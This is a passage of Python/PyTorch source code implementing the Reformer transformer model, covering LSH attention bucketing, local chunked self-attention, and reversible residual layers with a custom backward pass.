if attention_mask is not None and (attention_mask.sum().item() < batch_size * attention_mask.shape[-1]):
# add an extra bucket for padding tokens only
num_buckets = num_buckets + 1
# assign padding tokens extra bucket
buckets_mask = attention_mask.to(torch.uint8)[:, None, None, :].expand(buckets.shape)
buckets = torch.where(
buckets_mask, buckets, torch.tensor(num_buckets - 1, dtype=torch.long, device=buckets.device)
)
elif increase_num_buckets:
num_buckets = num_buckets + 1
# buckets is now (Batch_size x Num_Attn_Heads x Num_Hashes x Seq_Len).
# Next we add offsets so that bucket numbers from different hashing rounds don't overlap.
offsets = torch.arange(num_hashes, device=vectors.device)
offsets = (offsets * num_buckets).view((1, 1, -1, 1))
# expand to batch size and num attention heads
offsets = offsets.expand((batch_size, self.num_attention_heads) + offsets.shape[-2:])
offset_buckets = (buckets + offsets).flatten(start_dim=2, end_dim=3)
return offset_buckets
def _get_sorted_bucket_idx_and_undo_sorted_bucket_idx(self, sequence_length, buckets, num_hashes):
# no gradients are needed
with torch.no_grad():
# hash-based sort
sorted_bucket_idx = _stable_argsort(buckets, dim=-1)
# create simple indices to scatter to, to have undo sort
indices = (
torch.arange(sorted_bucket_idx.shape[-1], device=buckets.device)
.view(1, 1, -1)
.expand(sorted_bucket_idx.shape)
)
# get undo sort
undo_sorted_bucket_idx = sorted_bucket_idx.new(*sorted_bucket_idx.size())
undo_sorted_bucket_idx.scatter_(-1, sorted_bucket_idx, indices)
return sorted_bucket_idx, undo_sorted_bucket_idx
def _set_num_buckets(self, sequence_length):
# `num_buckets` should be set to 2 * sequence_length // chunk_length as recommended in paper
num_buckets_pow_2 = (2 * (sequence_length // self.chunk_length)).bit_length() - 1
# make sure buckets are power of 2
num_buckets = 2 ** num_buckets_pow_2
# factorize `num_buckets` if `num_buckets` becomes too large
num_buckets_limit = 2 * max(
int((self.max_position_embeddings // self.chunk_length) ** (0.5)), self.chunk_length,
)
if num_buckets > num_buckets_limit:
num_buckets = [2 ** (num_buckets_pow_2 // 2), 2 ** (num_buckets_pow_2 - num_buckets_pow_2 // 2)]
logger.warning("config.num_buckets is not set. Setting config.num_buckets to {}...".format(num_buckets))
# set num buckets in config to be properly saved
self.config.num_buckets = num_buckets
self.num_buckets = num_buckets
def _attend(
self,
query_vectors,
key_vectors,
value_vectors,
sorted_bucket_idx_per_hash,
attention_mask,
head_mask,
do_standard_self_attention,
do_cached_attention,
):
# look at previous and following chunks if chunked attention
if not do_standard_self_attention:
key_vectors = self._look_adjacent(key_vectors, self.num_chunks_before, self.num_chunks_after)
value_vectors = self._look_adjacent(value_vectors, self.num_chunks_before, self.num_chunks_after)
# get logits and dots
# (BS, NumAttn, NumHash x NumChunk, Chunk_L x Hidden),(BS, NumAttn, NumHash x NumChunk, Chunk_L * (Num_bef + Num_aft + 1) x Hidden) -> (BS, NumAttn, NumHash x NumChunk, Chunk_L, Chunk_L * (1 + Num_bef + Num_aft))
query_key_dots = torch.matmul(query_vectors, key_vectors.transpose(-1, -2))
# free memory
del query_vectors, key_vectors
# if chunked attention split bucket idxs to query and key
if not do_standard_self_attention:
query_bucket_idx = self._split_seq_length_dim_to(
sorted_bucket_idx_per_hash, -1, self.chunk_length, self.num_attention_heads
)
key_value_bucket_idx = self._look_adjacent(query_bucket_idx, self.num_chunks_before, self.num_chunks_after)
elif do_cached_attention and query_key_dots.ndim > 4:
key_value_bucket_idx = sorted_bucket_idx_per_hash
query_bucket_idx = (
key_value_bucket_idx.new_ones(key_value_bucket_idx.shape[:-1] + (1,)) * key_value_bucket_idx.max()
)
elif do_cached_attention and query_key_dots.ndim <= 4:
query_bucket_idx = (query_key_dots.shape[-1] - 1) * torch.ones_like(query_key_dots)[:, :, :, -1]
key_value_bucket_idx = torch.arange(
query_key_dots.shape[-1], dtype=torch.long, device=query_key_dots.device
)[None, None, :].expand(query_bucket_idx.shape[:2] + (-1,))
else:
query_bucket_idx = key_value_bucket_idx = sorted_bucket_idx_per_hash
# get correct mask values depending on precision
if query_key_dots.dtype == torch.float16:
self_mask_value = self.self_mask_value_float16.half()
mask_value = self.mask_value_float16.half()
else:
self_mask_value = self.self_mask_value_float32
mask_value = self.mask_value_float32
if not do_cached_attention:
mask = self._compute_attn_mask(
query_bucket_idx,
key_value_bucket_idx,
attention_mask,
query_key_dots.shape,
do_standard_self_attention,
)
if mask is not None:
query_key_dots = torch.where(mask, query_key_dots, mask_value)
# free memory
del mask
# Self mask is ALWAYS applied.
# From the reformer paper (https://arxiv.org/pdf/2001.04451.pdf):
# " While attention to the future is not allowed, typical implementations of the
# Transformer do allow a position to attend to itself.
# Such behavior is undesirable in a shared-QK formulation because the dot-product
# of a query vector with itself will almost always be greater than the dot product of a
# query vector with a vector at another position. We therefore modify the masking
# to forbid a token from attending to itself, except in situations
# where a token has no other valid attention targets (e.g. the first token in a sequence) "
self_mask = torch.ne(query_bucket_idx.unsqueeze(-1), key_value_bucket_idx.unsqueeze(-2)).to(
query_bucket_idx.device
)
# apply self_mask
query_key_dots = torch.where(self_mask, query_key_dots, self_mask_value)
# free memory
del self_mask
logits = torch.logsumexp(query_key_dots, dim=-1, keepdim=True)
# dots shape is `[batch_size, num_attn_heads, num_hashes * seq_len // chunk_length, chunk_length, chunk_length * (1 + num_chunks_before + num_chunks_after)]`
attention_probs = torch.exp(query_key_dots - logits)
# free memory
del query_key_dots
# dropout
attention_probs = nn.functional.dropout(attention_probs, p=self.dropout, training=self.training)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
# attend values
out_vectors = torch.matmul(attention_probs, value_vectors)
# free memory
del value_vectors
# merge chunk length
if out_vectors.ndim > 4:
logits = logits.flatten(start_dim=2, end_dim=3).squeeze(-1)
out_vectors = out_vectors.flatten(start_dim=2, end_dim=3)
return out_vectors, logits, attention_probs
def _compute_attn_mask(
self, query_indices, key_indices, attention_mask, query_key_dot_shape, do_standard_self_attention
):
# attention mask for LSH
if attention_mask is not None:
# if chunked attention, the attention mask has to correspond to LSH order
attention_mask = attention_mask.to(torch.uint8)[:, None, :]
if not do_standard_self_attention:
# expand attn_mask to fit with key_value_bucket_idx shape
attention_mask = attention_mask[:, None, :]
attention_mask = attention_mask.expand(query_indices.shape[:-1] + (-1,))
# extract attention mask from LSH sorted key_indices
attention_mask = torch.gather(attention_mask, -1, key_indices)
attention_mask = attention_mask.unsqueeze(-2).expand(query_key_dot_shape)
# Causal mask
if self.is_decoder is True:
causal_mask = torch.ge(query_indices.unsqueeze(-1), key_indices.unsqueeze(-2)).to(query_indices.device)
# add attention mask if not None
if attention_mask is not None:
attention_mask = causal_mask * attention_mask
else:
attention_mask = causal_mask
return attention_mask
def _get_relevant_hid_states_and_buckets(
self, query_vectors, attention_mask, num_hashes, hidden_states, past_states, past_buckets
):
# concat hidden states
hidden_states = torch.cat([past_states, hidden_states], dim=1)
# batch_size hidden
batch_size = hidden_states.shape[0]
sequence_length = hidden_states.shape[1]
# check if cached buckets include pad bucket
max_bucket = self.num_buckets if isinstance(self.num_buckets, int) else reduce(mul, self.num_buckets)
# if pad bucket was cached => need to increase num buckets for caching
increase_num_buckets = past_buckets.max() > num_hashes * max_bucket - 1
# retrieve query buckets
query_buckets = self._hash_vectors(
query_vectors, num_hashes, attention_mask, increase_num_buckets=increase_num_buckets
)
# concat buckets
concat_buckets = torch.cat([past_buckets, query_buckets.unsqueeze(-1)], dim=-1)
# hash-based sort
bucket_idx = _stable_argsort(concat_buckets, dim=-1)
# bucket_idx has shape: BatchSize x NumAttnHeads x NumHashes x SequenceLength
assert bucket_idx.shape == (
batch_size,
self.num_attention_heads,
num_hashes,
sequence_length,
), f"bucket_idx should have shape {(batch_size, self.num_attention_heads, num_hashes, sequence_length)}, but has shape {bucket_idx.shape}."
# find indices of new bucket indices
relevant_bucket_idx = (bucket_idx == (bucket_idx.shape[-1] - 1)).nonzero()
# expand relevant bucket indices to its chunks
relevant_bucket_idx_chunk = self._expand_to_indices_in_relevant_chunk(relevant_bucket_idx, sequence_length)
relevant_bucket_idx_chunk = bucket_idx[tuple(relevant_bucket_idx_chunk.transpose(0, 1))]
# adapt bucket_idx for batch and hidden states for index select
bucket_idx_batch_offset = sequence_length * (
batch_size
* torch.arange(relevant_bucket_idx_chunk.shape[-1], device=hidden_states.device, dtype=torch.long)
// relevant_bucket_idx_chunk.shape[-1]
)
# add batch offset
relevant_bucket_idx_chunk_all_batch = relevant_bucket_idx_chunk + bucket_idx_batch_offset
hidden_states = hidden_states.reshape((-1, self.hidden_size))
# select all relevant hidden states
relevant_hidden_states = hidden_states.index_select(0, relevant_bucket_idx_chunk_all_batch)
# reshape hidden states and bucket_idx to correct output
relevant_hidden_states = relevant_hidden_states.reshape(
batch_size, self.num_attention_heads, -1, self.hidden_size
)
relevant_bucket_idx_chunk = relevant_bucket_idx_chunk.reshape(
batch_size, self.num_attention_heads, num_hashes, -1
)
assert (
relevant_hidden_states.shape[2]
== (self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length * num_hashes
), f"There should be {(self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length * num_hashes} `hidden_states`, there are {relevant_hidden_states.shape[2]} `hidden_states`."
assert (
relevant_bucket_idx_chunk.shape[-1]
== (self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length
), f"There should be {(self.num_chunks_before + self.num_chunks_after + 1) * self.chunk_length} `hidden_states`, there are {relevant_bucket_idx_chunk.shape[-1]} `bucket_idx`."
return relevant_hidden_states, relevant_bucket_idx_chunk, query_buckets
def _expand_to_indices_in_relevant_chunk(self, indices, sequence_length):
# get relevant indices of where chunk starts and its size
start_indices_chunk = ((indices[:, -1] // self.chunk_length) - self.num_chunks_before) * self.chunk_length
total_chunk_size = self.chunk_length * (1 + self.num_chunks_before + self.num_chunks_after)
# expand start indices and add correct chunk offset via arange
expanded_start_indices = start_indices_chunk.unsqueeze(-1).expand(indices.shape[0], total_chunk_size)
chunk_sequence_indices = expanded_start_indices + torch.arange(
total_chunk_size, device=indices.device, dtype=torch.long
).unsqueeze(0).expand(indices.shape[0], total_chunk_size)
# make sure that circular logic holds via % seq len
chunk_sequence_indices = chunk_sequence_indices.flatten() % sequence_length
# expand indices and set indices correctly
indices = indices.unsqueeze(1).expand((indices.shape[0], total_chunk_size, -1)).flatten(0, 1).clone()
indices[:, -1] = chunk_sequence_indices
return indices
def _len_and_dim_norm(self, vectors):
"""
length and attention head size dim normalization
"""
vectors = self._len_norm(vectors)
vectors = vectors * torch.rsqrt(
torch.tensor(self.attention_head_size, device=vectors.device, dtype=vectors.dtype)
)
return vectors
def _len_norm(self, x, epsilon=1e-6):
"""
length normalization
"""
variance = torch.mean(x ** 2, -1, keepdim=True)
norm_x = x * torch.rsqrt(variance + epsilon)
return norm_x
def _gather_by_expansion(self, vectors, idxs, num_hashes):
"""
expand dims of idxs and vectors for all hashes and gather
"""
expanded_idxs = idxs.unsqueeze(-1).expand(-1, -1, -1, self.attention_head_size)
vectors = vectors.repeat(1, 1, num_hashes, 1)
return torch.gather(vectors, 2, expanded_idxs)
class ReverseSort(Function):
"""
After chunked attention is applied which sorted clusters,
original ordering has to be restored.
Since customized backward function is used for Reformer,
the gradients of the output vectors have to be explicitely
sorted here.
"""
@staticmethod
def forward(ctx, out_vectors, logits, sorted_bucket_idx, undo_sorted_bucket_idx):
# save sorted_bucket_idx for backprop
with torch.no_grad():
ctx.sorted_bucket_idx = sorted_bucket_idx
# undo sort to have correct order for next layer
expanded_undo_sort_indices = undo_sorted_bucket_idx.unsqueeze(-1).expand(out_vectors.shape)
out_vectors = torch.gather(out_vectors, 2, expanded_undo_sort_indices)
logits = torch.gather(logits, 2, undo_sorted_bucket_idx)
return out_vectors, logits
@staticmethod
def backward(ctx, grad_out_vectors, grad_logits):
# get parameters saved in ctx
sorted_bucket_idx = ctx.sorted_bucket_idx
expanded_sort_indices = sorted_bucket_idx.unsqueeze(-1).expand(grad_out_vectors.shape)
# reverse sort of forward
grad_out_vectors = torch.gather(grad_out_vectors, 2, expanded_sort_indices)
grad_logits = torch.gather(grad_logits, 2, sorted_bucket_idx)
# return grad and `None` fillers for last 2 forward args
return grad_out_vectors, grad_logits, None, None
class LocalSelfAttention(nn.Module, EfficientAttentionMixin):
def __init__(self, config):
super().__init__()
self.num_attention_heads = config.num_attention_heads
self.chunk_length = config.local_attn_chunk_length
self.num_chunks_before = config.local_num_chunks_before
self.num_chunks_after = config.local_num_chunks_after
self.is_decoder = config.is_decoder
self.pad_token_id = config.pad_token_id
self.attention_head_size = config.attention_head_size
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.hidden_size = config.hidden_size
# projection matrices
self.query = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
self.key = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
self.value = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
self.dropout = config.local_attention_probs_dropout_prob
# save mask value here
self.register_buffer("mask_value_float16", torch.tensor(-1e4))
self.register_buffer("mask_value_float32", torch.tensor(-1e9))
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
past_buckets_states=None,
use_cache=False,
output_attentions=False,
**kwargs
):
sequence_length = hidden_states.shape[1]
batch_size = hidden_states.shape[0]
# check if cache shall be used and that hidden states are already cached
if use_cache and past_buckets_states[1] is not None:
assert (
past_buckets_states[0] is None
), "LocalSelfAttention should not make use of `buckets`. There seems to be an error when caching hidden_states_and_buckets."
key_value_hidden_states = self._retrieve_relevant_hidden_states(
past_buckets_states[1], self.chunk_length, self.num_chunks_before
)
key_value_hidden_states = torch.cat([key_value_hidden_states, hidden_states], dim=1)
# only query vector for last token
query_vectors = self.query(hidden_states)
# compute key and value for relevant chunk
key_vectors = self.key(key_value_hidden_states)
value_vectors = self.value(key_value_hidden_states)
# free memory
del key_value_hidden_states
else:
# project hidden_states to query, key and value
query_vectors = self.query(hidden_states)
key_vectors = self.key(hidden_states)
value_vectors = self.value(hidden_states)
# split last dim into `config.num_attention_heads` and `config.attention_head_size`
query_vectors = self._split_hidden_size_dim(query_vectors, self.num_attention_heads, self.attention_head_size)
key_vectors = self._split_hidden_size_dim(key_vectors, self.num_attention_heads, self.attention_head_size)
value_vectors = self._split_hidden_size_dim(value_vectors, self.num_attention_heads, self.attention_head_size)
assert (
query_vectors.shape[-1] == self.attention_head_size
), "last dim of query_key_vectors is {} but should be {}.".format(
query_vectors.shape[-1], self.attention_head_size
)
assert (
key_vectors.shape[-1] == self.attention_head_size
), "last dim of query_key_vectors is {} but should be {}.".format(
key_vectors.shape[-1], self.attention_head_size
)
assert (
value_vectors.shape[-1] == self.attention_head_size
), "last dim of query_key_vectors is {} but should be {}.".format(
value_vectors.shape[-1], self.attention_head_size
)
if self.chunk_length is None:
assert (
self.num_chunks_before == 0 and self.num_chunks_after == 0
), "If `config.chunk_length` is `None`, make sure `config.num_chunks_after` and `config.num_chunks_before` are set to 0."
# normalize key vectors
key_vectors = key_vectors / torch.sqrt(
torch.tensor(self.attention_head_size, device=key_vectors.device, dtype=key_vectors.dtype)
)
# get sequence length indices
indices = torch.arange(sequence_length, device=query_vectors.device).repeat(
batch_size, self.num_attention_heads, 1
)
# if one should do normal n^2 self-attention
do_standard_self_attention = sequence_length <= self.chunk_length
# if input should be chunked
if not do_standard_self_attention:
# chunk vectors
# B x Num_Attn_Head x Seq_Len // chunk_len x chunk_len x attn_head_size
query_vectors = self._split_seq_length_dim_to(
query_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
)
key_vectors = self._split_seq_length_dim_to(
key_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
)
value_vectors = self._split_seq_length_dim_to(
value_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
)
# chunk indices
query_indices = self._split_seq_length_dim_to(indices, -1, self.chunk_length, self.num_attention_heads)
key_indices = self._split_seq_length_dim_to(indices, -1, self.chunk_length, self.num_attention_heads)
# append chunks before and after
key_vectors = self._look_adjacent(key_vectors, self.num_chunks_before, self.num_chunks_after)
value_vectors = self._look_adjacent(value_vectors, self.num_chunks_before, self.num_chunks_after)
key_indices = self._look_adjacent(key_indices, self.num_chunks_before, self.num_chunks_after)
else:
query_indices = key_indices = indices
# query-key matmul: QK^T
query_key_dots = torch.matmul(query_vectors, key_vectors.transpose(-1, -2))
# free memory
del query_vectors, key_vectors
mask = self._compute_attn_mask(
query_indices, key_indices, attention_mask, query_key_dots.shape, do_standard_self_attention
)
if mask is not None:
# get mask tensor depending on half precision or not
if query_key_dots.dtype == torch.float16:
mask_value = self.mask_value_float16.half()
else:
mask_value = self.mask_value_float32
query_key_dots = torch.where(mask, query_key_dots, mask_value)
# free memory
del mask
# softmax
logits = torch.logsumexp(query_key_dots, dim=-1, keepdim=True)
attention_probs = torch.exp(query_key_dots - logits)
# free memory
del logits
# dropout
attention_probs = nn.functional.dropout(attention_probs, p=self.dropout, training=self.training)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
# attend values
out_vectors = torch.matmul(attention_probs, value_vectors)
# free memory
del value_vectors
# merge chunk length
if not do_standard_self_attention:
out_vectors = out_vectors.flatten(start_dim=2, end_dim=3)
assert out_vectors.shape == (batch_size, self.num_attention_heads, sequence_length, self.attention_head_size,)
out_vectors = self._merge_hidden_size_dims(out_vectors, self.num_attention_heads, self.attention_head_size)
if output_attentions is False:
attention_probs = ()
return LocalSelfAttentionOutput(hidden_states=out_vectors, attention_probs=attention_probs)
def _compute_attn_mask(
self, query_indices, key_indices, attention_mask, query_key_dots_shape, do_standard_self_attention
):
# chunk attention mask and look before and after
if attention_mask is not None:
attention_mask = attention_mask.to(torch.uint8)[:, None, :]
if not do_standard_self_attention:
attention_mask = self._split_seq_length_dim_to(attention_mask, -1, self.chunk_length, 1)
attention_mask = self._look_adjacent(attention_mask, self.num_chunks_before, self.num_chunks_after)
# create attn_mask
attention_mask = attention_mask.unsqueeze(-2).expand(query_key_dots_shape)
# Causal mask
if self.is_decoder is True:
causal_mask = torch.ge(query_indices.unsqueeze(-1), key_indices.unsqueeze(-2)).to(query_indices.device)
# add attention mask if not None
if attention_mask is not None:
attention_mask = causal_mask * attention_mask
else:
attention_mask = causal_mask
return attention_mask
@staticmethod
def _retrieve_relevant_hidden_states(previous_hidden_states, chunk_length, num_chunks_before):
start_position = ((previous_hidden_states.shape[1] // chunk_length) - num_chunks_before) * chunk_length
return previous_hidden_states[:, start_position:]
class ReformerSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
all_head_size = config.num_attention_heads * config.attention_head_size
self.dropout = config.hidden_dropout_prob
self.dense = nn.Linear(all_head_size, config.hidden_size, bias=False)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
return hidden_states
class ReformerAttention(nn.Module):
def __init__(self, config, layer_id=0):
super().__init__()
self.layer_id = layer_id
self.attn_layers = config.attn_layers
self.layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
if len(set(self.attn_layers)) == 1 and self.attn_layers[0] == "lsh":
self.self_attention = LSHSelfAttention(config)
elif len(set(self.attn_layers)) == 1 and self.attn_layers[0] == "local":
self.self_attention = LocalSelfAttention(config)
elif len(set(self.attn_layers)) == 2 and set(self.attn_layers) == set(["lsh", "local"]):
# get correct attn layers
if self.attn_layers[self.layer_id] == "lsh":
self.self_attention = LSHSelfAttention(config)
else:
self.self_attention = LocalSelfAttention(config)
else:
raise NotImplementedError(
"Only attn layer types 'lsh' and 'local' exist, but got `config.attn_layers`: {}. Select attn layer types from ['lsh', 'local'] only.".format(
self.attn_layers
)
)
self.output = ReformerSelfOutput(config)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
num_hashes=None,
past_buckets_states=None,
use_cache=False,
orig_sequence_length=None,
output_attentions=False,
buckets=None,
):
hidden_states = self.layer_norm(hidden_states)
# make sure cached hidden states is set to None for backward pass
if past_buckets_states is not None:
past_buckets_states_layer = past_buckets_states[self.layer_id]
else:
past_buckets_states_layer = None
# use cached buckets for backprob if buckets not None for LSHSelfAttention
self_attention_outputs = self.self_attention(
hidden_states=hidden_states,
head_mask=head_mask,
attention_mask=attention_mask,
num_hashes=num_hashes,
past_buckets_states=past_buckets_states_layer,
use_cache=use_cache,
output_attentions=output_attentions,
buckets=buckets,
)
# add buckets if necessary
if hasattr(self_attention_outputs, "buckets"):
buckets = self_attention_outputs.buckets
else:
buckets = None
# cache hidden states for future use
if use_cache:
if past_buckets_states[self.layer_id][0] is None:
# padded input should not be cached
past_buckets = (
buckets[:, :, :, :orig_sequence_length]
if (buckets is not None and orig_sequence_length > 1)
else buckets
)
else:
past_buckets = torch.cat([past_buckets_states[self.layer_id][0], buckets], dim=-1)
if past_buckets_states[self.layer_id][1] is None:
# padded input should not be cached
past_states = hidden_states[:, :orig_sequence_length]
else:
past_states = torch.cat([past_buckets_states[self.layer_id][1], hidden_states], dim=1)
past_buckets_states[self.layer_id] = (past_buckets, past_states)
# compute attention feed forward output
attention_output = self.output(self_attention_outputs.hidden_states)
return AttentionOutput(
hidden_states=attention_output, attention_probs=self_attention_outputs.attention_probs, buckets=buckets,
)
class ReformerFeedForwardDense(nn.Module):
def __init__(self, config):
super().__init__()
self.dropout = config.hidden_dropout_prob
if isinstance(config.hidden_act, str):
self.act_fn = ACT2FN[config.hidden_act]
else:
self.act_fn = config.hidden_act
self.dense = nn.Linear(config.hidden_size, config.feed_forward_size)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
hidden_states = self.act_fn(hidden_states)
return hidden_states
class ReformerFeedForwardOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dropout = config.hidden_dropout_prob
self.dense = nn.Linear(config.feed_forward_size, config.hidden_size)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
return hidden_states
class ChunkReformerFeedForward(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dense = ReformerFeedForwardDense(config)
self.output = ReformerFeedForwardOutput(config)
def forward(self, attention_output):
return apply_chunking_to_forward(
self.chunk_size_feed_forward, self.seq_len_dim, self.forward_chunk, attention_output,
)
def forward_chunk(self, hidden_states):
hidden_states = self.layer_norm(hidden_states)
hidden_states = self.dense(hidden_states)
return self.output(hidden_states)
class ReformerLayer(nn.Module):
def __init__(self, config, layer_id=0):
super().__init__()
self.attention = ReformerAttention(config, layer_id)
# dropout requires to have the same
# seed for forward and backward pass
self.attention_seed = None
self.feed_forward_seed = None
self.feed_forward = ChunkReformerFeedForward(config)
def _init_attention_seed(self):
"""
This function sets a new seed for the
attention layer to make dropout deterministic
for both forward calls: 1 normal forward
call and 1 forward call in backward
to recalculate activations.
"""
# randomize seeds
# use cuda generator if available
if len(torch.cuda.default_generators) > 0:
# GPU
device_idx = torch.cuda.current_device()
self.attention_seed = torch.cuda.default_generators[device_idx].seed()
else:
# CPU
self.attention_seed = int(torch.seed() % sys.maxsize)
torch.manual_seed(self.attention_seed)
def _init_feed_forward_seed(self):
"""
This function sets a new seed for the
feed forward layer to make dropout deterministic
for both forward calls: 1 normal forward
call and 1 forward call in backward
to recalculate activations.
"""
# randomize seeds
# use cuda generator if available
if len(torch.cuda.default_generators) > 0:
# GPU
device_idx = torch.cuda.current_device()
self.feed_forward_seed = torch.cuda.default_generators[device_idx].seed()
else:
# CPU
self.feed_forward_seed = int(torch.seed() % sys.maxsize)
torch.manual_seed(self.feed_forward_seed)
def forward(
self,
prev_attn_output,
hidden_states,
attention_mask=None,
head_mask=None,
num_hashes=None,
past_buckets_states=None,
use_cache=False,
orig_sequence_length=None,
output_attentions=False,
):
with torch.no_grad():
# every forward pass we sample a different seed
# for dropout and save for forward fn in backward pass
# to have correct dropout
self._init_attention_seed()
attn_outputs = self.attention(
hidden_states=hidden_states,
head_mask=head_mask,
attention_mask=attention_mask,
num_hashes=num_hashes,
past_buckets_states=past_buckets_states,
use_cache=use_cache,
orig_sequence_length=orig_sequence_length,
output_attentions=output_attentions,
)
attn_output = attn_outputs.hidden_states
# Implementation of RevNet (see Fig. 6 in https://towardsdatascience.com/illustrating-the-reformer-393575ac6ba0)
# Y_1 = X_1 + f(X_2)
attn_output = prev_attn_output + attn_output
# free memory
del prev_attn_output
# every forward pass we sample a different seed
# for dropout and save seed for forward fn in backward
# to have correct dropout
self._init_feed_forward_seed()
# Y_2 = X_2 + g(Y_1)
hidden_states = hidden_states + self.feed_forward(attn_output)
return ReformerOutput(
attn_output=attn_output,
hidden_states=hidden_states,
attention_probs=attn_outputs.attention_probs,
buckets=attn_outputs.buckets,
)
def backward_pass(
self,
next_attn_output,
hidden_states,
grad_attn_output,
grad_hidden_states,
attention_mask=None,
head_mask=None,
buckets=None,
):
# Implements the backward pass for reversible ResNets.
# A good blog post on how this works can be found here:
# Implementation of RevNet (see Fig. 6 in https://towardsdatascience.com/illustrating-the-reformer-393575ac6ba0)
# This code is heavily inspired by https://github.com/lucidrains/reformer-pytorch/blob/master/reformer_pytorch/reversible.py
with torch.enable_grad():
next_attn_output.requires_grad = True
# set seed to have correct dropout
torch.manual_seed(self.feed_forward_seed)
# g(Y_1)
res_hidden_states = self.feed_forward(next_attn_output)
res_hidden_states.backward(grad_hidden_states, retain_graph=True)
with torch.no_grad():
# X_2 = Y_2 - g(Y_1)
hidden_states = hidden_states - res_hidden_states
del res_hidden_states
grad_attn_output = grad_attn_output + next_attn_output.grad
next_attn_output.grad = None
with torch.enable_grad():
hidden_states.requires_grad = True
# set seed to have correct dropout
torch.manual_seed(self.attention_seed)
# f(X_2)
# use cached buckets for backprob if buckets not None for LSHSelfAttention
output = self.attention(
hidden_states=hidden_states, head_mask=head_mask, attention_mask=attention_mask, buckets=buckets,
).hidden_states
output.backward(grad_attn_output, retain_graph=True)
with torch.no_grad():
# X_1 = Y_1 - f(X_2)
attn_output = next_attn_output - output
del output, next_attn_output
grad_hidden_states = grad_hidden_states + hidden_states.grad
hidden_states.grad = None
hidden_states = hidden_states.detach()
return ReformerBackwardOutput(
attn_output=attn_output,
hidden_states=hidden_states,
grad_attn_output=grad_attn_output,
grad_hidden_states=grad_hidden_states,
)
class _ReversibleFunction(Function):
"""
To prevent PyTorch from performing the usual backpropagation,
a customized backward function is implemented here. This way
it is made sure that no memory expensive activations are
saved during the forward pass.
This function is heavily inspired by https://github.com/lucidrains/reformer-pytorch/blob/master/reformer_pytorch/reversible.py
"""
@staticmethod
def forward(
ctx,
hidden_states,
layers,
attention_mask,
head_mask,
num_hashes,
all_hidden_states,
all_attentions,
past_buckets_states,
use_cache,
orig_sequence_length,
output_hidden_states,
output_attentions,
):
all_buckets = ()
# split duplicated tensor
hidden_states, attn_output = torch.chunk(hidden_states, 2, dim=-1)
for layer_id, (layer, layer_head_mask) in enumerate(zip(layers, head_mask)):
if output_hidden_states is True:
all_hidden_states.append(hidden_states)
layer_outputs = layer(
prev_attn_output=attn_output,
hidden_states=hidden_states,
attention_mask=attention_mask,
head_mask=layer_head_mask,
num_hashes=num_hashes,
past_buckets_states=past_buckets_states,
use_cache=use_cache,
orig_sequence_length=orig_sequence_length,
output_attentions=output_attentions,
)
attn_output = layer_outputs.attn_output
hidden_states = layer_outputs.hidden_states
all_buckets = all_buckets + (layer_outputs.buckets,)
if output_attentions:
all_attentions.append(layer_outputs.attention_probs)
# Add last layer
if output_hidden_states is True:
all_hidden_states.append(hidden_states)
# attach params to ctx for backward
ctx.save_for_backward(attn_output.detach(), hidden_states.detach())
ctx.layers = layers
ctx.all_buckets = all_buckets
ctx.head_mask = head_mask
ctx.attention_mask = attention_mask
# Concatenate 2 RevNet outputs
return torch.cat([attn_output, hidden_states], dim=-1)
@staticmethod
def backward(ctx, grad_hidden_states):
grad_attn_output, grad_hidden_states = torch.chunk(grad_hidden_states, 2, dim=-1)
# retrieve params from ctx for backward
attn_output, hidden_states = ctx.saved_tensors
# create tuple
output = ReformerBackwardOutput(
attn_output=attn_output,
hidden_states=hidden_states,
grad_attn_output=grad_attn_output,
grad_hidden_states=grad_hidden_states,
)
# free memory
del grad_attn_output, grad_hidden_states, attn_output, hidden_states
layers = ctx.layers
all_buckets = ctx.all_buckets
head_mask = ctx.head_mask
attention_mask = ctx.attention_mask
for idx, layer in enumerate(layers[::-1]):
# pop last buckets from stack
buckets = all_buckets[-1]
all_buckets = all_buckets[:-1]
# backprop
output = layer.backward_pass(
next_attn_output=output.attn_output,
hidden_states=output.hidden_states,
grad_attn_output=output.grad_attn_output,
grad_hidden_states=output.grad_hidden_states,
head_mask=head_mask[len(layers) - idx - 1],
attention_mask=attention_mask,
buckets=buckets,
)
assert all_buckets == (), "buckets have to be empty after backpropagation"
grad_hidden_states = torch.cat([output.grad_attn_output, output.grad_hidden_states], dim=-1)
# num of return vars has to match num of forward() args
# return gradient for hidden_states arg and None for other args
return grad_hidden_states, None, None, None, None, None, None, None, None, None, None, None
class ReformerEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.dropout = config.hidden_dropout_prob
self.layers = nn.ModuleList([ReformerLayer(config, i) for i in range(config.num_hidden_layers)])
# Reformer is using Rev Nets, thus last layer outputs are concatenated and
# Layer Norm is done over 2 * hidden_size
self.layer_norm = nn.LayerNorm(2 * config.hidden_size, eps=config.layer_norm_eps)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
num_hashes=None,
past_buckets_states=None,
use_cache=False,
orig_sequence_length=None,
output_hidden_states=False,
output_attentions=False,
):
